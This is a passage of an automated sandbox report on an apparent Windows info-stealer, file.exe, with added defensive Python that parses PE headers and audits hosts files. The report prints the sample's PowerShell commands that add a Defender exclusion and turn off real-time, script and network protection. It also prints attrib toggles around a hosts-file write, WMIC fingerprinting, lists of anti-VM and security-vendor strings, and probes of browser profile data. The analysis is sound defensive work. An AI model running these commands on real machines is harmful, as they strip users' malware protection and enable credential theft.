Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25E609E4-B259-11CF-BFC7-444553540000}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: file.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: file.exe | Static file information: File size 26987008 > 1048576
Source: file.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x947c00
Source: file.exe | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x792200
Source: file.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x876e00
Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: file.exe | Static PE information: section name: .xdata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFAAC36D2A5 pushad ; iretd 6_2_00007FFAAC36D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFAAC5571C9 push ebx; retf 6_2_00007FFAAC5571CA
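The static PE lines above come from a few header fields: the optional header's DllCharacteristics word (HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT and TERMINAL_SERVER_AWARE are individual bits), the 64-bit ImageBase, and the section table (names and virtual sizes). The following is an added example, not code from the report or the sample, that decodes those fields from raw bytes so a triager can reproduce the checks without a sandbox. The header bytes are constructed here to carry the values the report lists; they are not bytes from file.exe. Two caveats the report's signatures do not spell out: a .xdata section is ordinary GCC/MinGW-style x64 unwind data, so the "non-standard section name" heuristic alone is weak, and the Go runtime strings in the dump above point to a Go toolchain build, for which multi-megabyte .text/.rdata sections are normal.

```python
"""Decode PE hardening flags and section facts reported by the static checks above.

Added example, not code from the report or the sample. The header bytes are
constructed to mirror the reported values (PE32+, image base 0x140000000,
HIGH_ENTROPY_VA|DYNAMIC_BASE|NX_COMPAT|TERMINAL_SERVER_AWARE, an oversized
.text, a .xdata section); they are not bytes from file.exe.
"""
import struct

DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
# Names the common Windows linkers emit; anything else is reported, which
# mirrors the report's own check (it flags .xdata for this sample).
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                     ".pdata", ".reloc", ".rsrc", ".tls", ".CRT"}
BIG_SECTION = 0x100000  # 1 MiB, the threshold the report uses

def parse_pe(data):
    """Return image base, DllCharacteristics and the section table of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4                                  # IMAGE_FILE_HEADER (20 bytes)
    _machine, nsections, _, _, _, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20                                      # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x20B:                                 # PE32+: 8-byte ImageBase at +24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    elif magic == 0x10B:                               # PE32: 4-byte ImageBase at +28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]  # same offset in both formats
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i                  # IMAGE_SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, _vaddr, rawsize, _rawptr = struct.unpack_from("<IIII", data, off + 8)
        sections.append({"name": name, "virtual_size": vsize, "raw_size": rawsize})
    return {"pe32plus": magic == 0x20B, "image_base": image_base,
            "dll_characteristics": dll_chars, "sections": sections}

def flag_names(dll_chars):
    return [n for bit, n in sorted(DLL_CHARACTERISTICS.items()) if dll_chars & bit]

def assess(pe):
    """Triage notes: missing mitigations, oversized or oddly named sections."""
    flags = flag_names(pe["dll_characteristics"])
    notes = [f"missing {n}" for n in ("HIGH_ENTROPY_VA", "DYNAMIC_BASE", "NX_COMPAT") if n not in flags]
    for s in pe["sections"]:
        if s["virtual_size"] > BIG_SECTION:
            notes.append(f"virtual size of {s['name']} exceeds {BIG_SECTION:#x}")
        if s["name"] not in STANDARD_SECTIONS:
            notes.append(f"non-standard section name: {s['name']}")
    return notes

def build_sample_pe():
    """Constructed PE32+ header (headers only, no code) carrying the reported values."""
    e_lfanew = 0x80
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    dos += b"\0" * (e_lfanew - len(dos))
    opt_size = 240                                     # sizeof IMAGE_OPTIONAL_HEADER64
    file_header = struct.pack("<HHIIIHH", 0x8664, 2, 0, 0, 0, opt_size, 0x0022)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)
    struct.pack_into("<Q", opt, 24, 0x140000000)
    struct.pack_into("<H", opt, 70, 0x0020 | 0x0040 | 0x0100 | 0x8000)

    def section(name, vsize, rawsize):
        return name.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", vsize, 0x1000, rawsize,
                                                  0x400, 0, 0, 0, 0, 0x60000020)

    secs = section(b".text", 0x947a00, 0x947c00) + section(b".xdata", 0x1000, 0x1000)
    return dos + b"PE\0\0" + file_header + bytes(opt) + secs

if __name__ == "__main__":
    pe = parse_pe(build_sample_pe())
    print(f"image base {pe['image_base']:#x}: {', '.join(flag_names(pe['dll_characteristics']))}")
    print(*assess(pe), sep="\n")
```

Point parse_pe at the bytes of a real file to get the same report. The ImageBase offset differs between PE32 and PE32+ while DllCharacteristics sits at +70 in both, which is why the parser branches on the magic first; a parser that assumes one format silently reads the wrong field on the other.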

              Persistence and Installation Behavior

Source: C:\Users\user\Desktop\file.exe | Process created: attrib.exe
Source: C:\Users\user\Desktop\file.exe | Process created: attrib.exe
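The two attrib.exe launches recorded here are the -r / +r pair from the process list above: the sample clears the read-only bit on C:\Windows\System32\drivers\etc\hosts, writes to the file, then restores the bit so the file looks untouched. The report does not show what was written, so a responder has to audit the content rather than trust the attribute. The following is an added example, not code from the report or the sample, that parses a hosts file and flags entries redirecting security or update domains to a sinkhole address. The sample hosts content is constructed; virustotal.com and trendmicro.com are used because both appear as strings in the binary, and the watched-domain list is an assumption to be extended per environment.

```python
"""Audit a Windows hosts file for sinkholed security or update domains.

Added example, not code from the report or the sample. The report records only
the attrib -r / +r toggling around the hosts file, not what was written, so
SAMPLE_HOSTS is constructed; virustotal.com and trendmicro.com are used
because both appear as strings in the binary.
"""
import ipaddress

# Domains whose redirection blinds the victim or the responder (assumption:
# extend with your own AV, EDR and update endpoints).
WATCHED_SUFFIXES = ("virustotal.com", "trendmicro.com", "microsoft.com",
                    "windowsupdate.com", "kaspersky.com", "avast.com")
# Addresses that silently drop traffic: IPv4 loopback, the unspecified address, IPv6 loopback.
SINKHOLE_NETS = [ipaddress.ip_network("127.0.0.0/8"),
                 ipaddress.ip_network("0.0.0.0/32"),
                 ipaddress.ip_network("::1/128")]

SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#    127.0.0.1       localhost
#    ::1             localhost
127.0.0.1 www.virustotal.com
0.0.0.0 trendmicro.com    # appended entry
127.0.0.1 intranet.example.internal
192.0.2.10 cdn.example.net
"""

def parse_hosts(text):
    """Yield (lineno, ip_or_None, names) for every active line; comments are stripped."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            yield lineno, None, parts          # malformed line: keep it visible
            continue
        yield lineno, ip, parts[1:]

def is_sinkhole(ip):
    return ip is not None and any(ip in net for net in SINKHOLE_NETS)

def is_watched(name):
    host = name.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in WATCHED_SUFFIXES)

def audit_hosts(text):
    """Return (lineno, ip, name, verdict) tuples worth a responder's attention."""
    findings = []
    for lineno, ip, names in parse_hosts(text):
        if ip is None:
            findings.append((lineno, None, " ".join(names), "unparseable entry"))
            continue
        for name in names:
            if is_watched(name):
                verdict = "watched domain sinkholed" if is_sinkhole(ip) else "watched domain redirected"
                findings.append((lineno, str(ip), name, verdict))
    return findings

if __name__ == "__main__":
    print(*audit_hosts(SAMPLE_HOSTS), sep="\n")
```

On a live host, read C:\Windows\System32\drivers\etc\hosts and pass its text to audit_hosts; the intranet and CDN lines in the sample show that a loopback or private entry is only interesting when the name is one an attacker gains from blocking. The read-only attribute is not a control here, since the sample cleared and restored it with two attrib calls.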

              Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\file.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4479
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5393
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6669
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2923
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\Users\user\Desktop FullSizeInformation
              Source: C:\Users\user\Desktop\file.exe File Volume queried: \Device\CdRom0\ FullSizeInformation
              Source: file.exe Binary or memory string: andcontentCutmediaMusicmediaPhotomediaVideomediaPausefolderOpenviewZoomInvisibilityvolumeDownvolumeMuteboldItalicBoldItalicFYNE_CACHEvmwaretrayxenservicevmwareusermegadumperscyllahidemcafee.comnorton.comzillya.comsophos.comclamav.netpowershellsystemrootShowWin
              Source: file.exe Binary or memory string: account.svgradioButtoncontentCopycontentRedocontentUndomailComposemailForwardmediaRecordmediaReplayarrowDropUpviewRefreshviewRestoreviewZoomFitviewZoomOutinputRadiuslineSpacingheadingText[no events]EnumWindowsvboxservicecodecrackertotalav.comadaware.comProcess
              Source: file.exe Binary or memory string: authservicevmwareservicejoeboxcontrolprocesshackerhttp debuggerextremedumperprotection_idscanguard.compcprotect.comus.norton.comkaspersky.combullguard.comzonealarm.comdalTLDpSugct?GetTempPath2WModule32NextWRtlGetVersionGunjala_GondiMasaram_GondiMende_KikakuiOl
              Source: file.exe Binary or memory string: tPATHEXTnumber confirmcheckedwarningarrowUphistorydesktopstorageaccountpressedsuccessregularRegularControlregeditollydbgdf5servvmusrvcqemu-gafakenetfiddlerdumpcapsharpodsnifferpetoolsharmonycharlesphantomx32_dbgx64_dbgwpe proavg.comCaption%.2f GB\\.\UNCFloats:
              Source: file.exe Binary or memory string: nloadcomputer%-13s %qvmtoolsdvboxtraypestudiovmacthlpksdumperdebuggerstrongodgraywolf0harmonyreversaleset.com-CommandDisabled0.0.0.0 USERNAMEfinishedwsaioctlacceptexArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiragan
              Source: file.exe Binary or memory string: eteexec: numberdeletesearchfolderuploadlogoutbuttonorangeyellowpurpleerror_Italic%w: %sImage x32dbgvmsrvcprl_ccx96dbgdbgclrde4dotwindbgpc-retx64dbgghidra-ForceattribGetACPCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydia
              Source: file.exe, 00000000.00000002.1491354674.0000022DD4A63000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\file.exe Process token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe
              Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\file.exe File written: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get Name
              Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
              Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Roaming\fyne VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: \Device\CdRom0\ VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\Default\Desktop VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Local\Temp\games-Default VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default\Epic Games VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default\Minecraft VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\Default\Downloads VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\Default\Documents VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\Default\Documents\My Music VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\Default\Documents\My Pictures VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\Default\Documents\My Videos VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\Default\Videos VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\Default\Pictures VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\Default\Music VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Local\Temp\games-Public VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Local\Temp\games-Public\Public VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Local\Temp\games-Public\Public\Epic Games VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\Default\OneDrive VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Local\Temp\games-Public\Public\Minecraft VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\Public\Desktop VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\Public\Downloads VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\Public\Documents VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\Public\Documents\My Music VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\Public\Documents\My Pictures VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\Public\Documents\My Videos VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\Public\Videos VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\Public\Pictures VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\Public\Music VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\BXAJUJAOEO VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\LIJDSFKJZG VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\LFOPODGVOH VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Local\Temp\games-user\user VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\SNIPGPPREP VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Local\Temp\games-user\user\Epic Games VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\ZIPXYXWIOY VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Local\Temp\games-user\user\Minecraft VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Downloads VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Documents VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Documents\LFOPODGVOH VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Documents\LHEPQPGEWF VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Documents\LIJDSFKJZG VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Documents\HQJBRDYKDE VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Documents\My Music VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Documents\My Pictures VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Documents\My Videos VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Pictures VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Pictures\Camera Roll VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Videos VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Pictures\Saved Pictures VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Music VolumeInformation
              Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\OneDrive VolumeInformation
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Downloads VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\OneDrive VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Documents VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Desktop VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Documents\My Music VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Documents\My Pictures VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Documents VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Videos VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Pictures VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Pictures\Camera Roll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Pictures\Saved Pictures VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-jones VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-jones\jones VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Pictures VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Pictures\Camera Roll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\Music VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-jones\jones\Minecraft VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\bookmarkbackups VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\events VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived VolumeInformationJump to behavior
